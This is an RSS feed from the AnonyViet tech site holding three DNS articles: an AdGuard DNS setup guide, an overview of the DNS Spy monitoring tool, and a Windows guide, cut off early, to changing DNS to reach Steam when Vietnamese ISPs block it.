<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>DNS &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/dns/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Sat, 31 Aug 2024 22:09:21 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.2</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>DNS &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Surf the web ad-free with AdGuard DNS</title>
		<link>https://en.anonyviet.com/surf-the-web-ad-free-with-adguard-dns/</link>
					<comments>https://en.anonyviet.com/surf-the-web-ad-free-with-adguard-dns/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Sat, 31 Aug 2024 22:09:21 +0000</pubDate>
				<category><![CDATA[Software]]></category>
		<category><![CDATA[adfree]]></category>
		<category><![CDATA[Adguard]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Surf]]></category>
		<category><![CDATA[web]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=16690</guid>

					<description><![CDATA[Want to protect your personal information and enjoy an uninterrupted browsing experience without ads? AdGuard DNS will help you achieve that easily. AdGuard DNS not only provides an extra layer of security for your data, but also helps eliminate malicious ads and websites, providing a healthier online space. Join the channel Telegram belong to AnonyViet [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>Want to protect your personal information and enjoy an uninterrupted browsing experience without ads? <strong>AdGuard DNS</strong> will help you achieve that easily. AdGuard DNS not only provides an extra layer of security for your data, but also helps eliminate malicious ads and websites, providing a healthier online space.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-adguard-dns-hoat-dong-nhu-the-nao" class="ftwp-heading"><strong>How does AdGuard DNS work?</strong></h2>
<ul>
<li>When you visit a website or use an application, your browser sends a DNS request to determine the IP address of that web server.</li>
<li>This request is routed to AdGuard&#39;s DNS server instead of the default DNS server from your internet service provider.</li>
<li>AdGuard&#39;s DNS server will review the request and decide whether the IP address is blacklisted or not. If the IP address is blacklisted, the server will not provide the real IP address of the website.</li>
<li>Depending on the test results, the DNS server will return a fake IP address (0.0.0.0 or 176.103.130.130) for blocked websites, or the real IP address if the website is not blocked.</li>
<li>If the website is blocked, the browser will not be able to connect and will display a blocking message or a blank page. If the website is not blocked, the content will be loaded from the real IP address.</li>
</ul>
<figure id="attachment_61481" aria-describedby="caption-attachment-61481" style="width: 800px" class="wp-caption aligncenter"><img title="Surf the web ad-free with AdGuard DNS" loading="lazy" decoding="async" class="wp-image-61481 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-1.jpg" alt="How does AdGuard DNS work?" width="800" height="290" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-1-300x109.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-1-768x278.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-1-750x272.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-61481" class="wp-caption-text">How does AdGuard DNS work?</figcaption></figure>
<p><span style="color: #339966;"><em><strong>See more: Top <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Ftop-nhung-ung-dung-va-plugin-chan-quang-cao-youtube-con-hoat-dong%2F" class="local-link" rel="noopener">Youtube ad blocking apps and plugins</a> still active</strong></em></span></p>
<h2 id="ftoc-huong-dan-thiet-lap-va-su-dung-adguard-dns" class="ftwp-heading"><strong>AdGuard DNS Setup and Usage Guide</strong></h2>
<p><strong>Step 1:</strong> Visit AdGuard website <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fadguard.com%2Fvi%2Fdownload.html%3Fauto%3D1" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';"><span style="text-decoration: underline;"><strong>HERE</strong></span></a>  and download the application to your device.</p>
<p>Once completed, the AdGuard icon will appear on your desktop.</p>
<p><strong>Step 2:</strong> Go to Settings > Select &#39;Network &#038; Internet&#39;</p>
<figure id="attachment_61482" aria-describedby="caption-attachment-61482" style="width: 640px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61482 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-2.jpg" alt="Select &#39;Network &#038; Internet&#39;" width="640" height="342" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-2.jpg 640w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-2-300x160.jpg 300w" sizes="auto, (max-width: 640px) 100vw, 640px"/><figcaption id="caption-attachment-61482" class="wp-caption-text">Select &#39;Network &#038; Internet&#39;</figcaption></figure>
<p><strong>Step 3:</strong> Scroll down and select &#39;Change Adapter Options&#39;</p>
<figure id="attachment_61483" aria-describedby="caption-attachment-61483" style="width: 640px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61483 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-3.jpg" alt="Select &#39;Change Adapter Options&#39;" width="640" height="505" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-3.jpg 640w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-3-300x237.jpg 300w" sizes="auto, (max-width: 640px) 100vw, 640px"/><figcaption id="caption-attachment-61483" class="wp-caption-text">Select &#39;Change Adapter Options&#39;</figcaption></figure>
<p><strong>Step 4:</strong> Right click on the active connection and select &#39;Properties&#39;</p>
<figure id="attachment_61484" aria-describedby="caption-attachment-61484" style="width: 478px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61484 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-4.jpg" alt="Right click on the active connection and select &#39;Properties&#39;" width="478" height="454" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-4.jpg 478w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-4-300x285.jpg 300w" sizes="auto, (max-width: 478px) 100vw, 478px"/><figcaption id="caption-attachment-61484" class="wp-caption-text">Right click on the active connection and select &#39;Properties&#39;</figcaption></figure>
<p><strong>Step 5:</strong> Select &#39;Internet Protocol Version 4 (TCP/IPv4)&#39; and click &#39;Properties&#39;.</p>
<figure id="attachment_61485" aria-describedby="caption-attachment-61485" style="width: 361px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61485 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-5.jpg" alt="Select &#39;Internet Protocol Version 4 (TCP/IPv4)&#39; and click &#39;Properties&#39;." width="361" height="465" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-5.jpg 361w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-5-233x300.jpg 233w" sizes="auto, (max-width: 361px) 100vw, 361px"/><figcaption id="caption-attachment-61485" class="wp-caption-text">Select &#39;Internet Protocol Version 4 (TCP/IPv4)&#39; and click &#39;Properties&#39;.</figcaption></figure>
<p><strong>Step 6:</strong> Enter the DNS address as follows to block ads:</p>
<blockquote>
<p>94.140.14.14<br />94.140.15.15</p>
</blockquote>
<figure id="attachment_61486" aria-describedby="caption-attachment-61486" style="width: 401px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61486 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-6.jpg" alt="Fill in the DNS address as follows" width="401" height="452" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-6.jpg 401w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-6-266x300.jpg 266w" sizes="auto, (max-width: 401px) 100vw, 401px"/><figcaption id="caption-attachment-61486" class="wp-caption-text">Fill in the DNS address as follows</figcaption></figure>
<p><strong>Step 7:</strong> Click OK to save the settings and connect to AdGuard DNS.</p>
<figure id="attachment_61487" aria-describedby="caption-attachment-61487" style="width: 397px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61487 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-7.jpg" alt="Click OK" width="397" height="452" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-7.jpg 397w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-7-263x300.jpg 263w" sizes="auto, (max-width: 397px) 100vw, 397px"/><figcaption id="caption-attachment-61487" class="wp-caption-text">Click OK</figcaption></figure>
<h2 id="ftoc-mot-so-server-pho-bien" class="ftwp-heading"><strong>Some popular servers</strong></h2>
<h3 id="ftoc-server-mac-dinh" class="ftwp-heading"><strong>Default server</strong></h3>
<p>Function: Block ads and trackers.</p>
<blockquote>
<p>94.140.14.14<br />94.140.15.15</p>
</blockquote>
<h3 id="ftoc-server-khong-loc" class="ftwp-heading"><strong>Server not filtering</strong></h3>
<p>Features: Does not block any ads, trackers, or DNS requests.</p>
<blockquote>
<p>94.140.14.140<br />94.140.14.141</p>
</blockquote>
<h3 id="ftoc-server-bao-ve-gia-dinh" class="ftwp-heading"><strong>Family protection server</strong></h3>
<p>Functions: Blocks ads, trackers, adult content and enables safe search.</p>
<blockquote>
<p>94.140.14.15<br />94.140.15.16</p>
</blockquote>
<h2 id="ftoc-uu-diem-cua-adguard-dns" class="ftwp-heading"><strong>Advantages of AdGuard DNS</strong></h2>
<ul>
<li><strong>Free Services:</strong> AdGuard DNS offers a free service to enhance your browsing experience.</li>
<li><strong>Multi-device compatibility:</strong> AdGuard DNS can be applied on a wide range of devices such as phones, laptops, and tablets.</li>
<li><strong>Block annoying ads:</strong> Eliminate ads and tracking on all connected devices through powerful filtering.</li>
<li><strong>Increase web browsing speed:</strong> Improve page load speed by removing unnecessary elements.</li>
<li><strong>Customizable security mode:</strong> Allows users to customize security settings according to their needs.</li>
<li><strong>Detailed statistics:</strong> Provides detailed statistics on DNS requests, helping users track online activity.</li>
</ul>
<figure id="attachment_61488" aria-describedby="caption-attachment-61488" style="width: 750px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-61488 size-full" src="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-8.jpeg" alt="Advantages of AdGuard DNS" width="750" height="500" srcset="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-8.jpeg 750w, https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns-8-300x200.jpeg 300w" sizes="auto, (max-width: 750px) 100vw, 750px"/><figcaption id="caption-attachment-61488" class="wp-caption-text">Advantages of AdGuard DNS</figcaption></figure>
<h2 id="ftoc-nhuoc-diem-cua-adguard-dns" class="ftwp-heading"><strong>Disadvantages of AdGuard DNS</strong></h2>
<ul>
<li>Does not block all ads: Although it is capable of blocking the majority of ads, AdGuard DNS cannot block all of them, especially ads that use complex techniques.</li>
<li>May slow down web browsing: In some cases, especially with slow internet connections,</li>
<li>AdGuard DNS may slow down your browsing speed due to DNS request processing.</li>
<li>Sometimes unavailable: Due to global server distribution, AdGuard DNS may be unavailable in some regions.</li>
</ul>
<p><span style="color: #339966;"><em><strong>See also: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F3-cach-chan-quang-cao-tren-spotify-pc-khong-can-premium%2F" class="local-link" rel="noopener">3 ways to block ads on Spotify PC without Premium </a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p>With simple setup steps, you can enjoy a clean, safe cyberspace with <strong>AdGuard DNS</strong>. Start today to improve your browsing experience and protect your personal information from potential risks on the internet!</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/surf-the-web-ad-free-with-adguard-dns/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/06/adguard-dns.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>DNS Spy: DNS Analysis Tool of Any Domain</title>
		<link>https://en.anonyviet.com/dns-spy-dns-analysis-tool-of-any-domain/</link>
					<comments>https://en.anonyviet.com/dns-spy-dns-analysis-tool-of-any-domain/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 19 Aug 2024 07:28:27 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Analysis]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Domain]]></category>
		<category><![CDATA[Spy]]></category>
		<category><![CDATA[tool]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=16514</guid>

					<description><![CDATA[In today&#39;s internet world, maintaining the stability and security of a website is extremely important. One of the key factors that affects this stability is the DNS (Domain Name System). If you are managing a website or working in the IT field, you must have heard of DNS Spy. So what is DNS Spy? DNS [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p>In today&#39;s internet world, maintaining the stability and security of a website is extremely important. One of the key factors that affects this stability is the DNS (Domain Name System). If you are managing a website or working in the IT field, you must have heard of DNS Spy. So what is DNS Spy? <strong>DNS Spy</strong> What is it and why is it so important? Read on to find out!</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-hieu-ro-ve-dns-spy" class="ftwp-heading"><strong>Understanding DNS Spy</strong></h2>
<p><strong>DNS Spy</strong> is a tool designed to monitor and analyze your DNS configuration. DNS is like the phone book of the internet, translating easy-to-remember domain names (like example.com) into the IP addresses that computers use to communicate with each other. When your DNS isn&#39;t working properly, it can lead to problems like website downtime, slow page load times, or even security vulnerabilities.</p>
<figure id="attachment_65114" aria-describedby="caption-attachment-65114" style="width: 800px" class="wp-caption aligncenter"><img title="DNS Spy: DNS Analysis Tool of Any Domain" loading="lazy" decoding="async" class="wp-image-65114 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-1.jpg" alt="What is DNS Spy?" width="800" height="649" srcset="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-1-300x243.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-1-768x623.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-1-750x608.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65114" class="wp-caption-text">What is DNS Spy?</figcaption></figure>
<p>That’s where DNS Spy comes in. It constantly checks your DNS settings to make sure everything is configured correctly. Think of it as a “gatekeeper,” monitoring changes, detecting potential problems, and providing detailed reports so you can keep your website running smoothly and securely.</p>
<p><span style="color: #339966;"><em><strong>See also: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2F10-cong-cu-pentesting-ma-moi-hacker-deu-can%2F" class="local-link" rel="noopener">10 Pentesting Tools</a> that every hacker needs</strong></em></span></p>
<h2 id="ftoc-cac-tinh-nang-chinh-cua-dns-spy" class="ftwp-heading"><strong>Key Features of DNS Spy</strong></h2>
<p>DNS Spy has a series of useful features that help you manage DNS effectively. Here are the notable features of this tool:</p>
<h3 id="ftoc-giam-sat-theo-thoi-gian-thuc" class="ftwp-heading"><strong>Real-time monitoring</strong></h3>
<p>DNS Spy monitors your DNS records 24/7, alerting you to any changes or discrepancies as soon as they occur. This real-time monitoring is extremely important because even small changes to DNS settings can significantly impact your website&#39;s accessibility and performance.</p>
<figure id="attachment_65115" aria-describedby="caption-attachment-65115" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65115 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-2.jpg" alt="Key Features of DNS Spy" width="800" height="244" srcset="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-2.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-2-300x92.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-2-768x234.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-2-750x229.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65115" class="wp-caption-text">Key Features of DNS Spy</figcaption></figure>
<h3 id="ftoc-bao-cao-chi-tiet-va-toan-dien" class="ftwp-heading"><strong>Detailed and comprehensive reporting</strong></h3>
<p>DNS Spy not only alerts you to problems, but also provides detailed reports that help you understand what&#39;s going on. These reports can show everything from the health of your DNS records to potential security risks like DNS hijacking.</p>
<h3 id="ftoc-cung-cap-du-lieu-lich-su" class="ftwp-heading"><strong>Provide historical data</strong></h3>
<p>DNS Spy allows you to view historical DNS data, which is invaluable for troubleshooting. If a problem occurs, you can review how your DNS records have changed over time and determine when the problem started.</p>
<h3 id="ftoc-canh-bao-bao-mat" class="ftwp-heading"><strong>Security Warning</strong></h3>
<p>DNS Spy not only focuses on performance but also helps protect your domain from security threats. By monitoring for unauthorized changes, it can alert you to potential DNS hijackings, where attackers will attempt to redirect your traffic to malicious websites.</p>
<h2 id="ftoc-loi-ich-cua-viec-su-dung-dns-spy" class="ftwp-heading"><strong>Benefits of Using DNS Spy</strong></h2>
<ul>
<li>Minimize downtime by quickly detecting and fixing DNS issues, helping to minimize website downtime.</li>
<li>Ensuring correct DNS configuration helps your website load faster and operate more stably.</li>
<li>Detect and prevent DNS hijacking attacks, protecting your website from threats.</li>
<li>Automate DNS monitoring, freeing you up to focus on other important tasks.</li>
<li>Installation and use are extremely simple, even suitable for beginners.</li>
</ul>
<figure id="attachment_65116" aria-describedby="caption-attachment-65116" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65116 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-3.jpg" alt="Benefits of Using DNS Spy" width="800" height="459" srcset="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-3.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-3-300x172.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-3-768x441.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-3-750x430.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65116" class="wp-caption-text">Benefits of Using DNS Spy</figcaption></figure>
<h2 id="ftoc-huong-dan-su-dung-dns-spy" class="ftwp-heading"><strong>DNS Spy User Guide</strong></h2>
<p><strong>Step 1:</strong> Visit DNS Spy official website<span style="text-decoration: underline;"><strong><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fdnsspy.io%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">  HERE</a></strong></span></p>
<p><strong>Step 2:</strong> If you do not have an account, please register.</p>
<p><strong>Step 3:</strong> Add your domain name</p>
<figure id="attachment_65117" aria-describedby="caption-attachment-65117" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65117 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-4.jpg" alt="Add domain name" width="800" height="639" srcset="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-4.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-4-300x240.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-4-768x613.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-4-750x599.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65117" class="wp-caption-text">Add domain name</figcaption></figure>
<p><strong>Step 4:</strong> After adding domains, you can customize monitoring settings for each domain. Configuration options include:</p>
<ul>
<li>Check Frequency: You can choose how often to check DNS, for example every 5 minutes, 10 minutes, or 30 minutes.</li>
<li>DNS Record Type: You can select the type of DNS record you want to monitor, for example A, AAAA, CNAME, MX, NS, TXT, SOA.</li>
<li>Notifications: You can set up email notifications or other methods to be alerted when there are DNS changes or issues.</li>
</ul>
<figure id="attachment_65118" aria-describedby="caption-attachment-65118" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-65118 size-full" src="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-5.jpg" alt="DNS records" width="800" height="461" srcset="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-5.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-5-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-5-768x443.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/08/dns-spy-5-750x432.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-65118" class="wp-caption-text">DNS records</figcaption></figure>
<p><strong>Step 5:</strong> Once configured, DNS Spy will start monitoring your DNS. You can track the monitoring results on the dashboard, including:</p>
<ul>
<li>DNS Status: Displays the current status of DNS, such as normal operation, error, or warning.</li>
<li>Change History: Displays a history of DNS changes, including time, change type, and old and new values.</li>
<li>Detailed Reporting: Provides detailed reporting on DNS performance, including response times, errors, and other information.</li>
</ul>
<h2 id="ftoc-cac-tinh-nang-nang-cao-tuy-thuoc-vao-goi-dich-vu" class="ftwp-heading"><strong>Advanced features (depending on service plan)</strong></h2>
<p>In addition to the basic features, DNS Spy also offers some advanced features, such as:</p>
<ul>
<li>Monitor multiple domains at once.</li>
<li>Generate separate reports based on specific requirements</li>
<li>Integrate DNS Spy API with other applications and systems.</li>
</ul>
<p><span style="color: #339966;"><em><strong>See also: <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fcach-hacker-bypass-av-xam-nhap-windows-voi-autoit%2F" class="local-link" rel="noopener">How Hackers Bypass AV to Infiltrate Windows with Autoit</a></strong></em></span></p>
<h2 id="ftoc-loi-ket" class="ftwp-heading"><strong>Conclusion</strong></h2>
<p><strong>DNS Spy</strong> is a comprehensive and effective DNS monitoring solution that gives you peace of mind about the stability and security of your website. With powerful features and a friendly interface, this is the perfect choice for both individuals and businesses who want to optimize the performance and protect their websites.</p>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/dns-spy-dns-analysis-tool-of-any-domain/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2024/08/dns-spy.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>How to change DNS to access Steam when blocked</title>
		<link>https://en.anonyviet.com/how-to-change-dns-to-access-steam-when-blocked/</link>
					<comments>https://en.anonyviet.com/how-to-change-dns-to-access-steam-when-blocked/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 13 May 2024 11:45:56 +0000</pubDate>
				<category><![CDATA[Tips]]></category>
		<category><![CDATA[access]]></category>
		<category><![CDATA[blocked]]></category>
		<category><![CDATA[change]]></category>
		<category><![CDATA[DNS]]></category>
		<category><![CDATA[Steam]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=15602</guid>

					<description><![CDATA[How to change DNS is a simple but effective solution if you encounter the situation of not being able to access Steam, due to major networks such as FPT and Viettel suddenly applying blocking measures. Join the channel Telegram belong to AnonyViet 👉 Link 👈 How do network operators block Steam? Reports from the Vietnamese [&#8230;]]]></description>
										<content:encoded><![CDATA[
<div id="ftwp-postcontent">
<p><strong>How to change DNS</strong> is a simple but effective solution if you encounter the situation of not being able to access Steam, due to major networks such as FPT and Viettel suddenly applying blocking measures.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> belong to <span style="color: #008080;">AnonyViet</span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietoffical" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-cach-nha-mang-chan-steam-nhu-the-nao" class="ftwp-heading"><strong>How do network operators block Steam?</strong></h2>
<p>Reports from the Vietnamese gaming community have recently indicated that they are inaccessible <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fstore.steampowered.com%2F" class="ext-link" rel="external nofollow noopener" onclick="this.target='_blank';">Steam</a> via the networks of FPT, Viettel, VNPT since the afternoon of May 7. Some people believe that this may be part of a campaign to fight counterfeit goods and collect taxes from digital products.  This causes great inconvenience for gamers when they cannot access their accounts and game libraries.</p>
<figure id="attachment_60175" aria-describedby="caption-attachment-60175" style="width: 800px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60175 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-1.jpg" alt="Steam is currently inaccessible" width="800" height="449" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-1.jpg 800w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-1-300x168.jpg 300w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-1-768x431.jpg 768w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-1-750x421.jpg 750w" sizes="auto, (max-width: 800px) 100vw, 800px"/><figcaption id="caption-attachment-60175" class="wp-caption-text">Steam is currently inaccessible</figcaption></figure>
<p>A member of the J2TEAM Community discovered that when trying to connect to the Steam Store, the IP address was redirected to localhost (127.0.0.1), preventing access.  It is assumed that carriers have set up rules on the server or router to resolve the Steam Store domain name to a localhost IP address, similar to editing the Hosts file on Windows.</p>
<figure id="attachment_60176" aria-describedby="caption-attachment-60176" style="width: 589px" class="wp-caption aligncenter"><img loading="lazy" decoding="async" class="wp-image-60176 size-full" src="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-2.jpg" alt="How do network operators block Steam?" width="589" height="650" srcset="https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-2.jpg 589w, https://anonyviet.com/wp-content/uploads/2024/05/cach-doi-dns-de-truy-cap-vao-steam-2-272x300.jpg 272w" sizes="auto, (max-width: 589px) 100vw, 589px"/><figcaption id="caption-attachment-60176" class="wp-caption-text">How do network operators block Steam?</figcaption></figure>
<p>However, there has been no official announcement from the network service provider or from Steam, so the real reason behind it is still a mystery.</p>
<h2 id="ftoc-cach-vao-steam-bi-chan-bang-dns" class="ftwp-heading"><strong>How to access blocked Steam using DNS</strong></h2>
<h3 id="ftoc-huong-dan-doi-dns-tren-windows" class="ftwp-heading"><strong>Instructions for changing DNS on Windows</strong></h3>
<p><strong>Step 1:</strong> Open Control Panel by entering “control panel” into the Windows search box and selecting the appropriate result.</p>
